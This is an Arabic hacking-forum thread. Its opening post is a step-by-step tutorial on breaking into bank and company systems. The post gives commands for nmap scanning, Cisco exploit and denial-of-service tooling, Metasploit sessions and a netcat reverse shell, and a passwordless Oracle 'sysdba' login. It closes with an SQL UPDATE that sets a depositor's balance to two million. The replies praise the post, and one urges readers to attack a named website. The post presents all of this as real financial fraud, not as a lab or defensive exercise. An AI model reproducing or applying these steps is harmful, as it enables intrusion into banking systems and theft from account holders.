اشترك في قناتنا ليصلك جديدنا

اشترك في قناتنا على اليوتيوب ليصلك جديدنا

كذلك الاعجاب بصفحتنا على الفيسبوك

أختراق البنوك وأنظمة قواعد البيانات dbms شرح بالصور + الادوات + تطبيق

أختراق البنوك وأنظمة قواعد البيانات dbms شرح بالصور + الادوات + تطبيق


صفحة 1 من 2 12 الأخيرةالأخيرة
النتائج 1 إلى 10 من 20

الموضوع: أختراق البنوك وأنظمة قواعد البيانات dbms شرح بالصور + الادوات + تطبيق

  1. #1
    هكر مبتديء Array
    تاريخ التسجيل
    Jun 2011
    الدولة
    فلسطين رام الله
    المشاركات
    46

    aljyyosh أختراق البنوك وأنظمة قواعد البيانات dbms شرح بالصور + الادوات + تطبيق



    السلام عليكم
    حبيت ان أفيد كل هاكر مسلم محصور في أشياء صغيره في عالم الهاكر ويريد آن يتوسع من اجل ان ننافس قراصنة الغرب
    الموضوع عباره عن مقدمه في اختراق البنوك وأنظمة قواعد البيانات والمشهوره oracle التي تستخدمها البنوك والشركات
    المتطلبات والادوات للموضوع
    Backtrack
    sploit
    Skills
    Hacking skills
    خبره في لغة sql وقواعد البيانات
    خبره في نظام linux
    لكي تستفيد من الموضوع يجب عليك قرائه كل سطر وفهمه والتركيز
    ولكي تصبح متقن لأختراق في المستوى العاالي يجب عليك ملم بخيره ولو جديه بلغة sql
    و oracle sql ومعرفه قويه في اوامر نظام التشغيل linux
    لأن البنوك والشركات تستخدم قواعد بيانات oracle sql و sql servermicrosoft وشبكات السيسكو cisco ولكي تستطيع التحكم يجب عليك المعرفة بهذه الانظمه
    في هاكرز عرب كثير لا يفهم في البرمجه ولا السيطره على انظمه اللينكس ويريد اختراق بنوك
    لو جبت لك جهاز بنك او شركه ونت لا تعرف اللينكس ولا الاوراكل اس كي وال ما رح تقدر تسوي شي ولو معاك كل الباسوردات
    من هنا ينطلق الموضوع
    بسم الله نبداء
    قبل أي شي في أي خطوه لأختراق نظام هي معرفة مكوناته software لأن الثغرات هي تصيب البرمجيات
    وهناك طرق اخرى للأختراق من دون ثغرات مثل الدخول العنيف
    جبت لكم جدول يبين الانظمه المستخدمه في الشركات والبنوك وشركة الاتصالات في الاغلب
    طبعا الشرح رح يهتم على انظمة اوراكل لقواعد البيانات والسيسكو وكمان بعض الثغرات
    طبعا اثمن شي في البنوك والشركات هي قواعد البيانات
    وهذا ما رح يتمركز الحوار
    وكيفية ايجاد الشبكات المصابه وهذا سهل رح اشرحه لكم ايضا
    والادوات المستخدمه في الشرح هي نظام الباك تراك والميتاسبوليت
    ::::الخطوه الاولى:::::::
    فحص الهدف
    وهي كالعاده عمل اسكان عبر الايبي وهذي الخطوه تستخدم في جميع الاختراقات سواء مواقع او سيرفرات او اجهزة
    طبعا في النوك والشركات تفحص البرامج المركبه والبورتات المفتوحه
    ورح نستخدم اداة nmap
    طبعا ما رح اشرح الاداه لأنك لما تشوف هذا الموضوع على الاقل تكون فاهم الاساسيات وما رح اشرح للمبتدئن كيف
    يلا رح انازل ههههههه تسوي الامر
    Nmap –sV xx.xx.xx.xx
    شوفوا لصوره هذي

    =-=-=-==-=-=-=-=-
    الان عرفنا ان الهدف معاهم نضام اوراكل
    وكمان هناك سيرفرات تحتوي على نضام السيسكو
    والان عرفنا الهدف ايش مركب من نضام
    قبل ما ندخل في التطبيق رح اشرح انواع الانضمه
    اولا انظمة قواعد البيانات
    هناك شركات صنعت DBMS والي تدير قواعد البيانات
    مثل شركة ارواكل وميكروسوفت
    وهناك انظمه مخصصه مثل انظمه وزارة الدفاع الامريكيه
    شوفو هذا واجهة النظام مخصص

    ومثلا انظمه الاوراكل هذي واجه لتسجيل الدخول

    طبعا لأقتحام أي نضام لازم تعرف اول شي كيف تتصل للنضام وماذا يريد النضام منك للأتصال
    طبعا انا ما رح اشرح الحاجات الاساسيه في هذه الدوره بس بشرح النقاط التي تمكنك من فهم اختراق الانظمه للمؤسسات والشركات
    الان نتوجه الى الخطوه الثانيه
    :::::الخطوه الثانيه الاختراق:::::::
    رح ابداء معاكم في اختراق شبكات السيسكو الي اغلب الشركات تعمل عليها
    طبعا لأختراق شبكات السيسكو هناك اداوت موجوده على الباك تراك
    ونت لازم يكون معاك نضام اختراق قوي مثل الباك تراك للهجوم من هذا النوع
    نفتح الباك تراك
    نفتح الشل ونتوجه للمسار
    Cd /pentest/cisco/cisco-global-exploiter
    طبعا توجد اداه اسمها
    Cge.pl
    هذي هي اداة الاختراق لشبكات السيسكو الي تستثمر عدة انواع من الثغرات مثل البفر وكمان تعمل هجوم نكران الخدمه يهني توقف الشبكاه كامل
    لكي تشغل الاداه تكتب الامر
    Perl cge.pl
    ورح يشرح لك الاستخدام والثغرات بالترقيم
    شاهد الصوره

    طبعا استخدام الاده تكون
    هي
    Perl cge.pl xx.xx.xx.xx option
    نوع الهجومOption=
    بعد ماختار نوع الهجوم مثل buufer overflow
    والاتصال العكسي او التل نت
    او انك تختار
    Denial of services توقف عمل الشبكه وتشلها
    طبعا اهم شي انك توصل للمعومات وهذا اهم شي يهم المهاجم
    ونت لازم تحاول للأتصال عكسيا وهذا اهم شي وسوف تعرفون السبب في بقيه الدوره
    الان عرفنا من اهم الخطوات في بداية الاختراق
    خلونا نراجع
    نسوي اسكان
    نعرف البرامج المركبه على الهدف
    ايجاد ثغرات البرامج الانظمه
    استثمار ثغرات الانظمه او البرامج المركبه
    تم الاقتحام يعني وصلنا للجهاز
    الان كل الي شرحناه انت المفروض تكون عارفه وأكيد ما تتوقع ان اختراق انظمة المؤسسات والشركات بهذه السهوله ومثل أي اختراق
    بس الصعوبه بعد ما تقتحم النظام
    ايش هي الاجرائات الي رح تسويها
    =-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
    ::::الخطوه الثالثه الهجوم على النظام::::
    قبل ما تبداء الهجوم على الانظمه
    اولا اعرف ماذا تريد الحصول عليه وما هو نوع النظام وكيفية الدخول اليه
    طبعا رح اشرح لكم اسهل شي وهو اقتحام اشهر انظمة ادارة قواعد البيانات وهي الاوراكل والاغلب المستخدمه في الشركات
    الان رح نبداء الهجوم
    اول رح نبداء كيف نجمع معلومات قد تحتاجها في بعض العمليات في اختراق قواعد البيانات
    مثلا اشهر شي وهي SID وأيجاده سهل جدا عبر الميتا سبلويت ونحن لن نحتاجه في علمية الاختراق تبعنا في اخر الدرس ولكن مجرد شرح قد تحتاجه في المستقبل
    ما رح اشرح كثير انتم اكتفو باهذي الصورتين

    وهذه الصوره بعد التنفيذ

    SID=orcl
    SID=PLProc
    وهناك ادوات كثيره مساعده في اختراق الاوراكل اكتب انت في console
    الامر search oracle
    ورح تظهر لك كل الثغرات التي نزلت على هذي الانظمه وكمان ادوات مساعده
    طبعا SID رح يساعدك في اقتحام باسورد النظام ولكن انا بجيب لك طرق تقتحم النظام من دون باسورد
    والتي تدعهما اداه في الباك تراك اسم الاداه والمسار موجود في الصوره


    طبعا انت حاول توصل للاتصال للسيرفر من عبر أي ثغره او انك تخترق السيرفر عبر ال Fast Track في الباك تراك
    وهذي اخر الخطوات في الاختراق سواء عبر الفاست تراك في الباك تراك او عبر الميتا سبلويت
    واهم شي في الصور كما رح تشوفوا انه دخلنا للدوز تبع الضحيه

    طبعا نكتب الامر
    Sessions –l
    لعرض الاتصالات المتكونه
    ولدخول للاتصال نكتب
    Session –I 1
    حيث 1 رقم الاتصال ويمكن ان يكون معاك عدة اتصالات
    الصوره السابقه لنجاح استثمار ثغره من الثغرات والاتصال meterpreter
    اما الصوره هذي للدخول الى النظام للدوز بالامر
    Use –m process
    Execute –f cmd*****
    في حالة عدم الدخول للدوز تبع الضحيه تنفذ الامر
    Interact 1
    كما في الصوره


    او ان نتصل اتصال عكسي عبر النت كات بتنفيذ lcode طبعا بعد اختراق للسيرفر عبر ثغره buffer overflow
    بدايه نقوم بالتنصت


    بعد نجاح الاتصال


    الان تم الاختراق والخطوه القادمه في الجزء التالي من الشرح
    ؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟ ؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟ ؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟
    طبعا الان وصلنا الى المطلوب وهو النظام السؤال الان كيف ندخل الى نظام قواعد البيانات لكي نسوي الي جينا من اجله ^_^
    في انظمه الاواكل تستطيع الوصول للنظام عبر الدوز بالأمر
    Sqlplus
    وهذا هو أهم أمر ورح يدخلك الى نظام قواعد البيانات
    طبعا اكيد رح يطلب منك اليوزر والباسورد
    هنا للأقتحام معانا طريقتين
    الطريقه الاولى انك تكتب اليوزر system
    وهو اسم المستخدم للنظام في الانظمه الاوراكل
    وتخمن الباسورد او تستخدم طريقة ملك الهاكرز كيفن ميتنك في الهندسه الاجتماعيه كان يتصل لأحد الموضفين ويقول انه من احد جهات الصيانه ويطلب اليوزر والباسورد بس هذا شي صار صعب وحتى لو كان ينفع نادرا
    الطريقه الثانيه وهي الأضمن للاقتحام انك تكتب في خانة المستخدم
    System as sysdba
    وهي اختصار الى
    System administration
    يعني مدير النظام
    وتضغط enter ورح يطلب الباسورد ونت طنش وضغط enter مره اخره ورح تدخل من دون طلب كلمة السر
    كما في الصوره


    مبروك عليك الاقتحام انت الان صرت داخل النظام بصلاحية مدير النظام اكبر صلاحيه يعني تقدر تستعرض الملومات وتعدل وكل شي وهذا الي يهم المقتحم
    طبعا الان انت مخترق النظام من اجل استعراض جدول معين او سرقة معلومات او تعديل على معلومات مثلا تعديل على ارصده ومعاك الصلاحيات بس واجهت مشكله معرفة الجداول
    رح نضرب مثل وليكن التعديل على الرصيد ولا تعرف اسم الجدول او صيغة الجدول كيف هي
    المشكله هذي تحل بسهوله
    مع كتابة الامر
    SELECT * FROM user_catalog;
    طبعا رح تظهر لك الجداول غير مرتبه ولكي تعرضها مرتبه ننفذ الامر
    select *from cat
    order by TABLE_****;
    كما في الصوره



    طبعا يعرض كل الجداول ونت شوف الجدول الي تريد تستعرض المعلومات منه او التعديل عليه
    طبعا للعلم ان البنوك تستخدم الجدول اليه فيه المعلومات المهمه عن الرصيد depositor
    والتي تعني المودعون
    ويختلف من نضام الى نظام مثلا قد يكون accounts or clients
    طيب الان وجدنا الجدول المطلوب لكي تعرف الاعمده الي فيه والبيانات تكتب الامر
    Desc depositor
    ورح يعرض لك معلومات الجدول كما في الصوره


    الان عدينا مرحله بل مراحل طوال لكي نوصل الى ما وصلنا اليه الان وسوف نقوم حاليا بالاستعلام على رصيد احد العملاء وليكن اسمه john الذي يحمل الرقم 1009
    الان نريد نستخرج اسم العميل والرصيد المتوفر له
    بنسوي الامر
    Select ****,balance from depositor where id=1009;
    طبعا لكي تعرض كل المعلومات تختصر الامر وتسوي * بدل اسماء الاعمده
    شاهدو الصوره

    الان نريد نرفع الرصيد الى 2 مليون طبعا انت لازم يكون معاك خبره في اوامر sql ورح ننفذ امر التحديث والي هو update ورح تكون الصيغه
    Update depositor
    Set balance=2000000
    Where id=1009;
    ورح تضهر لك رساله تم التعديل بس في الشرح الرساله مش معرفه بالغه النظام المخترق
    كما في الصوره



    الان نتأكد من التعديل وننفذ الامر الاول


    DONE
    هذا فيديوا في اختراق بنك ليس كما شرحناه باختراق اوراكل وأنما sql server تبع شركة مايكروسوفت
    نفس الخطوات فحص واستثمار الثغرات وقتحام النظام
    الفيديوا
    http://www.37mb.com/download.php?id=68

    والى هنا وصلنا الى نهاية المطاف وهذا ليس كل الطرق التي يتم بها الاختراق وهناك طرق اخرى مثل Remote client وهي طريقه معقده شويه
    الشرح كان محاكاه الى واقع الاختراق العملي وأهم شي من الشرح كان فهم الفكره في الاختراق والخطوات الصحيحه للهجوم وهذا ما ينقص الهاكر وانا متأكد من اغلب الخطوات كانت معرفوه لدى الهاكر متوسطي المستوى والمحترفين بس النقص كان كيف يشغل المهارات ..
    وانا هنا اتوقف عن الشرح وأرجوا الاستخدام فيما ينفع الامه الاسلاميه وليس ما يضرها


    تحميل الشرح بصيغة كتاب pdf
    http://www.mediafire.com/?olr77dw3pq4en5i

    تم حفظ الحقوق لاسطورة صنعاء



  2. #2
    هكر مبتديء Array
    تاريخ التسجيل
    Dec 2009
    المشاركات
    31

    افتراضي رد: أختراق البنوك وأنظمة قواعد البيانات dbms شرح بالصور + الادوات + تطبيق

    والله انت فخر للاسلام والعرب
    بس انا مازلت اواجه مشاكل في البك ترك VMware
    مع الاسف الشديد


  3. #3
    هكر مجتهد Array الصورة الرمزية mr.hacker.dz
    تاريخ التسجيل
    Apr 2012
    المشاركات
    214

    افتراضي رد: أختراق البنوك وأنظمة قواعد البيانات dbms شرح بالصور + الادوات + تطبيق

    الله يخليك يامبدع



  4. #4
    هكر مجتهد Array الصورة الرمزية mr.hacker.dz
    تاريخ التسجيل
    Apr 2012
    المشاركات
    214

    افتراضي رد: أختراق البنوك وأنظمة قواعد البيانات dbms شرح بالصور + الادوات + تطبيق

    موضوع قوة فلا تحرمنا من مواضيع اخرى


  5. #5
    هكر مجتهد Array الصورة الرمزية ابـن غـزة
    تاريخ التسجيل
    Jun 2012
    الدولة
    فـلـسـطـيـن
    المشاركات
    345

    افتراضي رد: أختراق البنوك وأنظمة قواعد البيانات dbms شرح بالصور + الادوات + تطبيق

    يـعـطـيـكـ آآلـفـ عـآآفـيـة


  6. #6
    هكر متميز Array الصورة الرمزية Mr.nakad
    تاريخ التسجيل
    Feb 2012
    المشاركات
    1,105

    افتراضي رد: أختراق البنوك وأنظمة قواعد البيانات dbms شرح بالصور + الادوات + تطبيق

    يعطيك العافية

    ومشكور للنقل _ولذكر الحقوق

    تحياتي لك



  7. #7
    هكر مبتديء Array
    تاريخ التسجيل
    Jul 2012
    المشاركات
    29

    افتراضي رد: أختراق البنوك وأنظمة قواعد البيانات dbms شرح بالصور + الادوات + تطبيق

    موضوع روعة واصل


  8. #8
    هكر مبتديء Array الصورة الرمزية MDK
    تاريخ التسجيل
    Jun 2012
    المشاركات
    52

    افتراضي رد: أختراق البنوك وأنظمة قواعد البيانات dbms شرح بالصور + الادوات + تطبيق

    اولا شكراا لك اخي الكريم على الموضوع الرائع
    ثانيا ادعو كل مسلم يخاف على دينة ان يخترق هذا الموقع بما به من امور شيطانية و تكفير بالله تعالى وسأدعو لكل من يخترق هذا الموقع ولولا اني مبتدء للخترقتة وهذا هو الموقع
    600club-banner.jpg


    http://www.satanicchurch.com/content


  9. #9
    هكر مبتديء Array
    تاريخ التسجيل
    Jun 2012
    المشاركات
    52

    افتراضي رد: أختراق البنوك وأنظمة قواعد البيانات dbms شرح بالصور + الادوات + تطبيق

    روعه عاشت ايدك



  10. #10
    هكر مبتديء Array الصورة الرمزية xXRoNalDoXx
    تاريخ التسجيل
    Aug 2012
    المشاركات
    39

    افتراضي رد: أختراق البنوك وأنظمة قواعد البيانات dbms شرح بالصور + الادوات + تطبيق

    شكراااااااااااااااااااااا ااا جدا


صفحة 1 من 2 12 الأخيرةالأخيرة

المواضيع المتشابهه

  1. xSQLScanner - فك كلمات مرور قواعد البيانات وفحص امن قواعد MS-SQL و MySQL
    بواسطة She!! Access في المنتدى منتدى برامج وأدوات الهكرز
    مشاركات: 5
    آخر مشاركة: 06-19-2012, 01:29 AM
  2. تركيب قواعد البيانات Mysqldumper
    بواسطة ASDELY-ScOrPiOn في المنتدى تطوير المواقع والمنتديات
    مشاركات: 7
    آخر مشاركة: 05-25-2012, 09:03 PM
  3. كيف تخترق البنوك و انظمة قواعد البينات
    بواسطة yheya في المنتدى منتدى الإختراق العام
    مشاركات: 14
    آخر مشاركة: 04-04-2012, 03:00 AM
  4. تعلم قواعد البيانات و sql
    بواسطة BLACK.JaGuAr في المنتدى تطوير المواقع والمنتديات
    مشاركات: 4
    آخر مشاركة: 01-30-2011, 10:49 PM
  5. شرح بالصور لتغيير مسار حفظ المرفقات لتفادى الأخطاء فى قواعد البيانات
    بواسطة ASDELY-ScOrPiOn في المنتدى تطوير المواقع والمنتديات
    مشاركات: 4
    آخر مشاركة: 05-27-2010, 04:03 PM

وجد الزوار هذه الصفحة بالبحث عن:

كيفية اختراق البنوك وتحويل مبالغ مالية

هكر بنوك

http:www.aljyyosh.comvbshowthread.phpt=35406

كيفية اختراق بنك

تهكير البنوك

تحميل برامج اختراق البنوك

كيفية قرصنة البنوك

برنامج اختراق بنوك

اختراق البنوك وأنظمة قواعد البيانات

اختراق الانظمة البنكية

كيفية اختراق المصارف

اختراق البنوك

برنامج اختراق البنوك

كيفية تهكير البنوك

انظمة الهكرز الاختراق المواقع والانظمة

اختراق قاعدة البياناتبرامج اختراق البنوكاختراق سيرفرات البنوكاختراق الانظمةاختراق قاعدة بياناتبرامج قرصنة البنوكدورة اختراق البنوكهكر البنوكقرصنه البنوكاختراق انظمة البنوك

المفضلات

أذونات المشاركة

  • لا تستطيع إضافة مواضيع جديدة
  • لا تستطيع الرد على المواضيع
  • لا تستطيع إرفاق ملفات
  • لا تستطيع تعديل مشاركاتك
  •